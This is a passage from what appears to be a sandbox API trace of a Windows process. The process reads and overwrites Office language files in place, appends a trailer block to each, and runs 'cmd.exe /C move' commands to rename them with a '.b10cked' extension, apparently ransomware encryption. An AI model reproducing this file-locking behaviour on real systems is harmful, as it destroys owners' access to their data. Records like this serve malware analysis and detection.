lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0168.473] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0168.473] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xcaf, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xcaf, lpOverlapped=0x0) returned 1 [0168.479] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONINTL.REST.trx_dll", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0168.479] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONINTL.REST.trx_dll", cchWideChar=19, lpMultiByteStr=0x1328744, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ONINTL.REST.trx_dll", lpUsedDefaultChar=0x0) returned 19 [0168.479] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x3d960 [0168.480] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0168.480] CloseHandle (hObject=0x114) returned 1 [0168.482] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.REST.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL~2.TRX") returned 0x3c [0168.483] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\") returned 0x30 [0168.483] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL.REST.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL.REST.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0xfcc, dwThreadId=0x9d8)) returned 1 [0168.485] CloseHandle (hObject=0x1b4) returned 1 [0168.485] CloseHandle (hObject=0x114) returned 1 [0168.485] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0168.485] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0168.485] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount2=52) returned 2 [0168.485] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0168.485] ReleaseMutex (hMutex=0xf8) returned 1 [0168.485] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0168.485] ReleaseMutex (hMutex=0xf8) returned 1 [0168.485] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0168.485] ReleaseMutex (hMutex=0xf8) returned 1 [0168.485] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0168.485] ReleaseMutex (hMutex=0xf8) returned 1 [0168.485] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\outllibr.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0168.486] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.486] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x35960 [0168.486] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.486] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=22527512063) returned 1 [0168.486] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.486] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x35960 [0168.486] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.486] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.486] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x35960 [0168.486] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.486] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0168.486] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x35960 [0168.486] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0168.486] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.486] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x35960 [0168.487] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.487] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.487] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x35960 [0168.487] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.487] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.487] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x35960 [0168.487] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.487] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.487] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x35960 [0168.487] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.487] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.487] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x35960 [0168.487] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.487] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.487] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x35960 [0168.487] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.488] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x35478 [0168.488] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0168.503] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0168.503] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0168.503] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x35960 [0168.503] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0168.503] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0168.503] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0168.503] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x35960 [0168.504] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0168.504] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0168.504] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0168.521] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xbcaf, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xbcaf, lpOverlapped=0x0) returned 1 [0168.535] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0168.535] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0168.536] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xbcaf, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xbcaf, lpOverlapped=0x0) returned 1 [0168.537] SetFilePointer (in: hFile=0x114, lDistanceToMove=-109743, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1acb1 [0168.537] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0168.538] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xbcaf, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xbcaf, lpOverlapped=0x0) returned 1 [0168.540] SetFilePointer (in: hFile=0x114, lDistanceToMove=-109743, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1acb1 [0168.540] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0168.540] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xbcaf, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xbcaf, lpOverlapped=0x0) returned 1 [0168.550] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLLIBR.DLL.trx_dll", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0168.550] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLLIBR.DLL.trx_dll", cchWideChar=20, lpMultiByteStr=0x1328744, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OUTLLIBR.DLL.trx_dll", lpUsedDefaultChar=0x0) returned 20 [0168.550] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x35960 [0168.550] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0168.551] CloseHandle (hObject=0x114) returned 1 [0168.792] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.DLL.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLI~1.TRX") returned 0x3c [0168.795] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\") returned 0x30 [0168.796] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLI~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLIBR.DLL.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLI~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLIBR.DLL.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0x4b0, dwThreadId=0x808)) returned 1 [0168.864] CloseHandle (hObject=0x1b4) returned 1 [0168.864] CloseHandle (hObject=0x114) returned 1 [0168.864] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0168.864] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0168.864] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount2=52) returned 2 [0168.864] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0168.864] ReleaseMutex (hMutex=0xf8) returned 1 [0168.864] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0168.864] ReleaseMutex (hMutex=0xf8) returned 1 [0168.864] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0168.864] ReleaseMutex (hMutex=0xf8) returned 1 [0168.865] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0168.865] ReleaseMutex (hMutex=0xf8) returned 1 [0168.865] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\outllibr.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0168.866] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.866] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x9f560 [0168.866] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.866] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=22565570230) returned 1 [0168.867] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.867] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x9f560 [0168.867] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.867] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.867] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x9f560 [0168.867] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.867] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.867] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x9f560 [0168.867] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.867] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.867] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x9f560 [0168.867] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.867] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.868] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x9f560 [0168.868] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.868] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.868] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x9f560 [0168.868] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.868] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.868] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x9f560 [0168.868] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.868] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.868] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x9f560 [0168.868] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.868] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.868] SetFilePointer (in: hFile=0x114, 